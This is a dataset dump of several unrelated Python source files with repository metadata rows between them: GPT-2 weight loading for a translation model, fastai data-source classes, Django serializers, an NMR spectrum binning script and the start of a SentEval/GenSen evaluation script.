load_models.append(tgt_emb.gpt_model)
load_embs.append(tgt_emb)
else:
if model_opt.gpt2_init_embanddec or model_opt.simple_fusion:
load_models = [load_decoder]
elif model_opt.gpt2_init_embandenc:
load_models = [encoder]
it_list = list(checkpoint['gpt2_params'])
for lm_idx, load_model in enumerate(load_models):
for name, array in it_list:
name = name[6:]
name = name.split('/')
assigned = False
if name[0] == 'wpe':
if model_opt.GPT_representation_mode != 'none':
pointer = load_embs[lm_idx].make_embedding.pe.pe.weight
else:
pointer = load_model.embeddings.make_embedding.pe.pe.weight
elif name[0] == 'wte':
if model_opt.GPT_representation_mode != 'none':
pointer = [load_embs[lm_idx].make_embedding.emb_luts[0].weight, gen_linear.weight]
else:
pointer = [load_model.embeddings.make_embedding.emb_luts[0].weight]
if not model_opt.nopretrain_decemb:
pointer.append(gen_linear.weight)
if model_opt.simple_fusion and model_opt.sf_pretrain_dec_emb:
pointer.append(decoder.embeddings.make_embedding.emb_luts[0].weight)
elif name[0] == 'ln_f':
if name[1] == 'g':
pointer = load_model.layer_norm.weight
elif name[1] == 'b':
pointer = load_model.layer_norm.bias
else:
raise ValueError('I am missing something here!')
elif name[0][0] == 'h':
layer_num = name[0][1:]
pointer = getattr(load_model.transformer_layers, layer_num)
if name[1] == 'attn':
assigned = True
pointer = pointer.self_attn
full_data = torch.from_numpy(array)
if name[2] == 'c_attn':
end_size = full_data.shape[-1]//3
assert full_data.shape[-1] % 3 == 0
if name[3] == 'b':
if init_something:
pointer.linear_query.bias.data = full_data[:end_size]
pointer.linear_keys.bias.data = full_data[end_size:end_size*2]
pointer.linear_values.bias.data = full_data[end_size*2:]
if model_opt.gpt2_params_std > 0:
pointer.linear_query.bias.orig = full_data[:end_size].clone()
pointer.linear_keys.bias.orig = full_data[end_size:end_size*2].clone()
pointer.linear_values.bias.orig = full_data[end_size*2:].clone()
elif name[3] == 'w':
if init_something:
pointer.linear_query.weight.data = full_data[:, :end_size].t().contiguous()
pointer.linear_keys.weight.data = full_data[:, end_size:end_size*2].t().contiguous()
pointer.linear_values.weight.data = full_data[:, end_size*2:].t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.linear_query.weight.orig = full_data[:, :end_size].t().contiguous().clone()
pointer.linear_keys.weight.orig = full_data[:, end_size:end_size*2].t().contiguous().clone()
pointer.linear_values.weight.orig = full_data[:, end_size*2:].t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[2] == 'c_proj':
if name[3] == 'b':
if init_something:
pointer.final_linear.bias.data = full_data
if model_opt.gpt2_params_std > 0:
pointer.final_linear.bias.orig = full_data.clone()
elif name[3] == 'w':
if init_something:
pointer.final_linear.weight.data = full_data.t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.final_linear.weight.orig = full_data.t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[1] == 'ln_1' or name[1] == 'ln_2':
num = name[1][3]
pointer = getattr(pointer, 'layer_norm_'+num)
if name[2] == 'b':
pointer = pointer.bias
elif name[2] == 'g':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
elif name[1] == 'mlp':
pointer = pointer.feed_forward
pointer = getattr(pointer, name[2])
if name[3] == 'b':
pointer = pointer.bias
elif name[3] == 'w':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
if not assigned:
if name[-1] == 'w' or name[-1] == 'g':
array = array.T
if not isinstance(pointer, list):
pointer = [pointer]
for pointer_i in pointer:
target_size = int(math.ceil(array.shape[0]/8))*8
padded_vocab = name[0] == 'wte' and pointer_i.shape[0] == target_size
padded_vocab = padded_vocab and pointer_i.shape[1:] == array.shape[1:]
try:
assert pointer_i.shape == array.shape or padded_vocab
except AssertionError as e:
e.args += (pointer_i.shape, array.shape)
raise
if init_something:
print("Initialize PyTorch weight {}".format(name))
if padded_vocab:
pointer_i.data[:array.shape[0]] = torch.from_numpy(array)
else:
pointer_i.data = torch.from_numpy(array)
if model_opt.gpt2_params_std > 0:
if padded_vocab:
raise NotImplementedError
else:
pointer_i.orig = torch.from_numpy(array).clone()
if 'enc_model' in checkpoint:
load_dict = {k[8:]: v for k, v in checkpoint['enc_model'] if 'encoder' in k}
encoder.load_state_dict(load_dict, strict=True)
else:
if model_opt.param_init != 0.0:
for p in model.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
for p in generator.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
if model_opt.param_init_glorot:
for p in model.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if not model_opt.unconditional and hasattr(model.encoder, 'embeddings') \
and model.encoder.embeddings is not None:
model.encoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_enc)
if hasattr(model.decoder, 'embeddings'):
model.decoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_dec)
if model_opt.notrain_emb or model_opt.notrain_embanddec:
if model_opt.position_encoding_learned_enc and model_opt.share_position_embeddings:
model.encoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
if model_opt.share_embeddings:
model.encoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
model.decoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
model.decoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
generator[0].weight.requires_grad = False
if model_opt.notrain_genbias:
generator[0].bias.requires_grad = False
if model_opt.notrain_embanddec:
for name, p in load_decoder.layer_norm.named_parameters():
p.requires_grad = False
for name, p in load_decoder.transformer_layers.named_parameters():
if 'context' not in name and 'ctx' not in name:
p.requires_grad = False
if model_opt.onlytrainln:
for name, p in model.decoder.named_parameters():
if 'layer_norm' not in name:
p.requires_grad = False
for p in generator.parameters():
p.requires_grad = False
if model_opt.onlytrainoutp:
if model_opt.share_decoder_embeddings:
raise ValueError
for p in model.decoder.parameters():
p.requires_grad = False
if model_opt.simple_fusion:
for p in lm_decoder.parameters():
p.requires_grad = False
for p in generator.lm_linear.parameters():
p.requires_grad = False
model.generator = generator
model.to(device)
if model_opt.model_dtype == 'fp16':
model.half()
for p in model.parameters():
if hasattr(p, 'orig'):
p.orig = p.orig.to(device)
if model_opt.model_dtype == 'fp16':
p.orig = p.orig.half()
return model
def linear_repr_patch(self):
return 'in_features={}, out_features={}, bias={}, wgrad={}, bgrad={}'.format(
self.in_features, self.out_features, self.bias is not None,
self.weight.requires_grad, self.bias.requires_grad if self.bias is not None else 'N/A'
)
def ln_repr_patch(self):
string = '{normalized_shape}, eps={eps}, ' \
'elementwise_affine={elementwise_affine}'.format(**self.__dict__)
string += ', wgrad={}, bgrad={}'.format(self.weight.requires_grad if self.weight is not None else 'N/A',
self.bias.requires_grad if self.bias is not None else 'N/A')
return string
def emb_repr_patch(self):
s = '{num_embeddings}, {embedding_dim}'
if self.padding_idx is not None:
s += ', padding_idx={padding_idx}'
if self.max_norm is not None:
s += ', max_norm={max_norm}'
if self.norm_type != 2:
s += ', norm_type={norm_type}'
if self.scale_grad_by_freq is not False:
s += ', scale_grad_by_freq={scale_grad_by_freq}'
if self.sparse is not False:
s += ', sparse=True'
s = s.format(**self.__dict__)
s += ', grad={}'.format(self.weight.requires_grad)
return s
def build_model(model_opt, opt, fields, checkpoint):
logger.info('Building model...')
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint)
nn.Linear.extra_repr = linear_repr_patch
nn.LayerNorm.extra_repr = ln_repr_patch
nn.Embedding.extra_repr = emb_repr_patch
logger.info(model)
return model
| true
| true
|
1c4246c3000494cc4c4d7a4c26fd49406dd8cde8
| 3,398
|
py
|
Python
|
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
dev/local/data/source.py
|
LaurenSpiegel/fastai_docs
|
4fe6b62116d88dea9610548133e6cadb6b260a73
|
[
"Apache-2.0"
] | null | null | null |
#AUTOGENERATED! DO NOT EDIT! File to edit: dev/05_data_source.ipynb (unless otherwise specified).
__all__ = ['DataSource', 'DsrcSubset', 'DsrcSubset']
from ..imports import *
from ..test import *
from ..core import *
from .core import *
from .pipeline import *
from ..notebook.showdoc import show_doc
@docs
class DataSource(PipedList):
"Applies a `Pipeline` of `tfms` to filtered subsets of `items`"
def __init__(self, items, tfms=None, filts=None):
if filts is None: filts = [range_of(items)]
self.filts = L(mask2idxs(filt) for filt in filts)
# Create map from item id to filter id
assert all_disjoint(self.filts)
self.filt_idx = L([None]*len(items))
for i,f in enumerate(self.filts): self.filt_idx[f] = i
super().__init__(items, tfms)
@property
def n_subsets(self): return len(self.filts)
def len(self,filt): return len(self.filts[filt])
def subset(self, i): return DsrcSubset(self, i)
def subsets(self): return map(self.subset, range(self.n_subsets))
def __repr__(self): return '\n'.join(map(str,self.subsets())) + f'\ntfm - {self.tfm}'
def __getitem__(self, i):
"Transformed item(s) at `i`"
its,fts = self.items[i],self.filt_idx[i]
if is_iter(i): return L(self.tfm(it, filt=f) for it,f in zip(its,fts))
else: return self.tfm(its, filt=fts)
_docs = dict(len="`len` of subset `filt`",
subset="Filtered `DsrcSubset` `i`",
subsets="Iterator for all subsets")
DataSource.train,DataSource.valid = add_props(lambda i,x: x.subset(i), 2)
@docs
class DsrcSubset():
"A filtered subset of a `DataSource`"
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self.decode_at(i), **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show item at `i`")
@docs
class DsrcSubset():
"A filtered subset of a `DataSource`"
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, filt=self.filt, **kwargs)
def decode_batch(self, b, **kwargs): return self.dsrc.decode_batch(b, filt=self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self[i], filt=self.filt, **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
decode_batch="Transform decode batch",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show decoded item at `i`")
| 44.12987
| 99
| 0.64744
|
__all__ = ['DataSource', 'DsrcSubset', 'DsrcSubset']
from ..imports import *
from ..test import *
from ..core import *
from .core import *
from .pipeline import *
from ..notebook.showdoc import show_doc
@docs
class DataSource(PipedList):
def __init__(self, items, tfms=None, filts=None):
if filts is None: filts = [range_of(items)]
self.filts = L(mask2idxs(filt) for filt in filts)
assert all_disjoint(self.filts)
self.filt_idx = L([None]*len(items))
for i,f in enumerate(self.filts): self.filt_idx[f] = i
super().__init__(items, tfms)
@property
def n_subsets(self): return len(self.filts)
def len(self,filt): return len(self.filts[filt])
def subset(self, i): return DsrcSubset(self, i)
def subsets(self): return map(self.subset, range(self.n_subsets))
def __repr__(self): return '\n'.join(map(str,self.subsets())) + f'\ntfm - {self.tfm}'
def __getitem__(self, i):
its,fts = self.items[i],self.filt_idx[i]
if is_iter(i): return L(self.tfm(it, filt=f) for it,f in zip(its,fts))
else: return self.tfm(its, filt=fts)
_docs = dict(len="`len` of subset `filt`",
subset="Filtered `DsrcSubset` `i`",
subsets="Iterator for all subsets")
DataSource.train,DataSource.valid = add_props(lambda i,x: x.subset(i), 2)
@docs
class DsrcSubset():
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self.decode_at(i), **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show item at `i`")
@docs
class DsrcSubset():
def __init__(self, dsrc, filt): self.dsrc,self.filt,self.filts = dsrc,filt,dsrc.filts[filt]
def __getitem__(self,i): return self.dsrc[self.filts[i]]
def decode(self, o, **kwargs): return self.dsrc.decode(o, filt=self.filt, **kwargs)
def decode_batch(self, b, **kwargs): return self.dsrc.decode_batch(b, filt=self.filt, **kwargs)
def decode_at(self, i, **kwargs): return self.decode(self[i], **kwargs)
def show_at (self, i, **kwargs): return self.dsrc.show(self[i], filt=self.filt, **kwargs)
def __len__(self): return len(self.filts)
def __eq__(self,b): return all_equal(b,self)
def __repr__(self): return coll_repr(self)
_docs = dict(decode="Transform decode",
decode_batch="Transform decode batch",
__getitem__="Encoded item(s) at `i`",
decode_at="Decoded item at `i`",
show_at="Show decoded item at `i`")
| true
| true
|
1c424705772097a3c80a8562483cdfce635a7dd3
| 403
|
py
|
Python
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 343
|
2015-01-05T14:19:35.000Z
|
2018-12-10T19:07:48.000Z
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 191
|
2015-01-03T00:48:19.000Z
|
2018-11-30T09:10:25.000Z
|
mayan/apps/common/tests/test_api.py
|
nattangwiwat/Mayan-EDMS-recitation
|
fcf16afb56eae812fb99144d65ae1ae6749de0b7
|
[
"Apache-2.0"
] | 257
|
2019-05-14T10:26:37.000Z
|
2022-03-30T03:37:36.000Z
|
from rest_framework import status
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from .mixins import CommonAPITestMixin
class CommonAPITestCase(CommonAPITestMixin, BaseAPITestCase):
auto_login_user = False
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| 28.785714
| 66
| 0.808933
|
from rest_framework import status
from mayan.apps.rest_api.tests.base import BaseAPITestCase
from .mixins import CommonAPITestMixin
class CommonAPITestCase(CommonAPITestMixin, BaseAPITestCase):
auto_login_user = False
def test_content_type_list_api_view(self):
response = self._request_content_type_list_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| true
| true
|
1c4247727af42b6f5aaf853eecedbf57120e3803
| 2,415
|
py
|
Python
|
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | 1
|
2019-06-16T07:57:15.000Z
|
2019-06-16T07:57:15.000Z
|
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | null | null | null |
checkmerge/analysis/report.py
|
jjkester/checkmerge
|
23d1d9982cd7dc333b5748be3415e9b92f6576f4
|
[
"Apache-2.0"
] | null | null | null |
import collections
import itertools
import typing
from checkmerge import analysis, report
class AnalysisResultMaxSeverityMetric(report.Metric):
"""
Metric for the maximum analysis result severity within a type.
"""
name = 'Max. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
"""
:param cls: The type of analysis result.
:param items: The results of the given type.
"""
value = max((item.severity for item in items))
super(AnalysisResultMaxSeverityMetric, self).__init__(value)
class AnalysisResultAvgSeverityMetric(report.Metric):
"""
Metric for the average analysis result severity within a type.
"""
name = 'Avg. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
"""
:param cls: The type of analysis result.
:param items: The results of the given type.
"""
value = sum((item.severity for item in items)) / float(len(items))
super(AnalysisResultAvgSeverityMetric, self).__init__(value)
class AnalysisResultMetric(report.Metric):
"""
Parent metric for types of analysis results.
"""
low = 1
high = 5
def __init__(self, cls: typing.Type[analysis.AnalysisResult], items: typing.List[analysis.AnalysisResult]):
self.name = cls.name
items = list(items)
max_severity = AnalysisResultMaxSeverityMetric(items)
avg_severity = AnalysisResultAvgSeverityMetric(items)
super(AnalysisResultMetric, self).__init__(len(items), children=[max_severity, avg_severity])
class AnalysisReport(report.Report):
"""
Report for analysis results.
"""
has_metrics = True
has_conflicts = True
def __init__(self, results: typing.Iterable[analysis.AnalysisResult]):
self.results_by_type = collections.defaultdict(list)
for result in results:
self.results_by_type[result.__class__].append(result)
def get_metrics(self) -> typing.Iterable[report.Metric]:
for cls, items in sorted(self.results_by_type.items(), key=lambda i: i[0].name):
yield AnalysisResultMetric(cls, items)
def get_conflicts(self) -> typing.Iterable[analysis.AnalysisResult]:
return sorted(itertools.chain(*self.results_by_type.values()), key=lambda r: -r.severity)
| 31.776316
| 111
| 0.677847
|
import collections
import itertools
import typing
from checkmerge import analysis, report
class AnalysisResultMaxSeverityMetric(report.Metric):
name = 'Max. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
value = max((item.severity for item in items))
super(AnalysisResultMaxSeverityMetric, self).__init__(value)
class AnalysisResultAvgSeverityMetric(report.Metric):
name = 'Avg. severity'
low = .5
high = 1.5
def __init__(self, items: typing.List[analysis.AnalysisResult]):
value = sum((item.severity for item in items)) / float(len(items))
super(AnalysisResultAvgSeverityMetric, self).__init__(value)
class AnalysisResultMetric(report.Metric):
low = 1
high = 5
def __init__(self, cls: typing.Type[analysis.AnalysisResult], items: typing.List[analysis.AnalysisResult]):
self.name = cls.name
items = list(items)
max_severity = AnalysisResultMaxSeverityMetric(items)
avg_severity = AnalysisResultAvgSeverityMetric(items)
super(AnalysisResultMetric, self).__init__(len(items), children=[max_severity, avg_severity])
class AnalysisReport(report.Report):
has_metrics = True
has_conflicts = True
def __init__(self, results: typing.Iterable[analysis.AnalysisResult]):
self.results_by_type = collections.defaultdict(list)
for result in results:
self.results_by_type[result.__class__].append(result)
def get_metrics(self) -> typing.Iterable[report.Metric]:
for cls, items in sorted(self.results_by_type.items(), key=lambda i: i[0].name):
yield AnalysisResultMetric(cls, items)
def get_conflicts(self) -> typing.Iterable[analysis.AnalysisResult]:
return sorted(itertools.chain(*self.results_by_type.values()), key=lambda r: -r.severity)
| true
| true
|
1c42484dfb1349b7f128742b125618ab7f66f4ea
| 553
|
py
|
Python
|
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | 4
|
2021-06-17T03:06:19.000Z
|
2022-02-08T17:39:29.000Z
|
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | null | null | null |
_singleActions-AsScripts/04_AnalyzePhotos.py
|
campbell-ja/MetashapePythonScripts
|
b4a54e49558a8a7d1c5dc2327f878a8c354bbe58
|
[
"CC0-1.0"
] | null | null | null |
# This script created by Joseph Aaron Campbell - 10/2020
""" Set up Working Environment """
# import Metashape library module
import Metashape
# create a reference to the current project via Document Class
doc = Metashape.app.document
# set reference for the currently active chunk
activeChunk = Metashape.app.document.chunk
# Estimate image quality
# this populates the 'Quality' column in the photos pane, under 'details' view
# this is not indicative of the actual image quality and is just here for example
activeChunk.analyzePhotos()
| 39.5
| 82
| 0.772152
|
import Metashape
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
activeChunk.analyzePhotos()
| true
| true
|
1c424a3c4b56515039f7ae7f528464de549d5d37
| 2,216
|
py
|
Python
|
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
py-code/nmrvar.py
|
alvicler/python-nmr
|
7b68275f0e1e8dd85622a6b796dc618eb5ac3e62
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import nmrglue as ng
import sys
import numpy as np
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'qt5')
import matplotlib.pyplot as plt
#import matplotlib
#print('Python version ' + sys.version)
#print('Pandas version ' + pd.__version__)
#print('Matplotlib version ' + matplotlib.__version__)
import os
samples = len(os.listdir('urine'))
this = sys.modules[__name__] # this is now your current namespace
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx # or array[idx]
i = 1
df = pd.DataFrame([])
yarr=[]
xarr=[]
## set the number of 1r files to open, always open first processed spectra ##
while i < samples+1:
name="urine/Calvin_Gab_ATU"+str(i)+"/1/pdata/1"
dic, data= ng.bruker.read_pdata(name)
sf=float(dic["procs"]["SF"])
sfo1=float(dic["acqus"]["SFO1"])
o1=float(dic["acqus"]["O1"])
hzppt=float(dic["acqus"]["SW_h"])/len(data)
swh=float(dic["acqus"]["SW_h"])
sr=o1+(sf-sfo1)*1000000.
pts=int(sr//hzppt) # Calc pts to Calibrate 0ppm to Xscale
data = ng.proc_base.rev(data) # reverse the data
#setattr(this, 'data%s' % i, data)
#### scale x from pts to ppm ###
## Bin size for PCA##
si=len(data)
xs=[]
for j in range(0-pts,si-pts):
hz=float(((o1-swh/2)+(hzppt*(j)))/sf)
xs+=[hz]
xs = np.asarray(xs)
#setattr(this, 'xs%s' % i, xs)
#xmin=xs.min()
xmin=-.25
#xmax=xs.max()
xmax=1.4
## Bin size for PCA##
xbin=(xmax-xmin)/5
#xbin=.25
k=1
f=0
a={}
for j in np.arange(xmin,xmax, xbin):
f=j+xbin
fpos=find_nearest(xs, f)
jpos=find_nearest(xs, j)
#print(jpos,fpos)
peak = data[jpos:fpos]
#peak_scale=xs[j:f]
#if peak.sum()<0:
# a['slice.'+str(k)]=0
#else:
#a[k]=peak.max().cumsum()
a[k]=peak.sum()
k+=1
#setattr(this, 'databin%s' % i, a)
b=pd.Series(a, name=i)
df = df.append(b)
yarr.append(data)
xarr.append(xs)
i += 1 ## index for number of spectra
df
| 22.845361
| 77
| 0.570397
|
import nmrglue as ng
import sys
import numpy as np
import pandas as pd
get_ipython().run_line_magic('matplotlib', 'qt5')
import matplotlib.pyplot as plt
import os
samples = len(os.listdir('urine'))
this = sys.modules[__name__]
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
i = 1
df = pd.DataFrame([])
yarr=[]
xarr=[]
ic, data= ng.bruker.read_pdata(name)
sf=float(dic["procs"]["SF"])
sfo1=float(dic["acqus"]["SFO1"])
o1=float(dic["acqus"]["O1"])
hzppt=float(dic["acqus"]["SW_h"])/len(data)
swh=float(dic["acqus"]["SW_h"])
sr=o1+(sf-sfo1)*1000000.
pts=int(sr//hzppt)
data = ng.proc_base.rev(data)
/sf)
xs+=[hz]
xs = np.asarray(xs)
xmin=-.25
xmax=1.4
k=1
f=0
a={}
for j in np.arange(xmin,xmax, xbin):
f=j+xbin
fpos=find_nearest(xs, f)
jpos=find_nearest(xs, j)
peak = data[jpos:fpos]
a[k]=peak.sum()
k+=1
b=pd.Series(a, name=i)
df = df.append(b)
yarr.append(data)
xarr.append(xs)
i += 1
| true
| true
|
1c424ae2b5a7e4f8cc44cdee482b49da3c0d31b5
| 1,622
|
py
|
Python
|
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | 8
|
2021-09-05T22:19:20.000Z
|
2021-10-06T13:40:50.000Z
|
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from rest_framework import serializers
from course.models import (
PaymentMethod,
Recording,
Category,
Lesson,
Enrollment,
SubscriptionType,
Module,
Group,
Course,
Subscription,
Event,
)
class ModuleSerializer(serializers.ModelSerializer):
class Meta:
model = Module
fields = "__all__"
class LessonSerializer(serializers.ModelSerializer):
class Meta:
model = Lesson
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
class Meta:
model = Enrollment
fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = Subscription
fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
class Meta:
model = SubscriptionType
fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
class Meta:
model = Group
fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
class Meta:
model = Recording
fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
class Meta:
model = Event
fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = "__all__"
| 20.024691
| 62
| 0.673859
|
from rest_framework import serializers
from course.models import (
PaymentMethod,
Recording,
Category,
Lesson,
Enrollment,
SubscriptionType,
Module,
Group,
Course,
Subscription,
Event,
)
class ModuleSerializer(serializers.ModelSerializer):
class Meta:
model = Module
fields = "__all__"
class LessonSerializer(serializers.ModelSerializer):
class Meta:
model = Lesson
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
class Meta:
model = Enrollment
fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = Subscription
fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
class Meta:
model = SubscriptionType
fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
class Meta:
model = Group
fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
class Meta:
model = Recording
fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
class Meta:
model = Event
fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = "__all__"
| true
| true
|
1c424b51f87ee9c16ce3ceab130d2364d060ec6d
| 80
|
py
|
Python
|
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
default_app_config = 'main.passport.apps.PassportConfig'
| 40
| 56
| 0.725
|
default_app_config = 'main.passport.apps.PassportConfig'
| true
| true
|
1c424bcf1e1344e55e8c40bcca6a160fb609ccc7
| 7,626
|
py
|
Python
|
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | 2
|
2018-12-19T22:06:22.000Z
|
2019-01-29T16:59:31.000Z
|
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | null | null | null |
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | 2
|
2019-02-10T22:40:43.000Z
|
2019-04-03T06:16:33.000Z
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
"""
Clone GenSen repo here: https://github.com/Maluuba/gensen.git
And follow instructions for loading the model used in batcher
"""
from __future__ import absolute_import, division, unicode_literals
import sys
import logging
# import GenSen package
from gensen import GenSen, GenSenSingle
import gensen
import numpy as np
# Set PATHs
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
PATH_TO_VEC = 'fasttext/crawl-300d-2M.vec'
# import SentEval
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
sys.path.insert(1,PATH_TO_SENTEVAL)
from AdversarialModels import WordNetSynonym
import io
def get_sentence(sentence):
sent = ""
for word in sentence:
sent+=word+" "
return sent
def create_dictionary(sentences, threshold=0):
words = {}
for s in sentences:
for word in s:
words[word] = words.get(word, 0) + 1
if threshold > 0:
newwords = {}
for word in words:
if words[word] >= threshold:
newwords[word] = words[word]
words = newwords
words['<s>'] = 1e9 + 4
words['</s>'] = 1e9 + 3
words['<p>'] = 1e9 + 2
sorted_words = sorted(words.items(), key=lambda x: -x[1]) # inverse sort
id2word = []
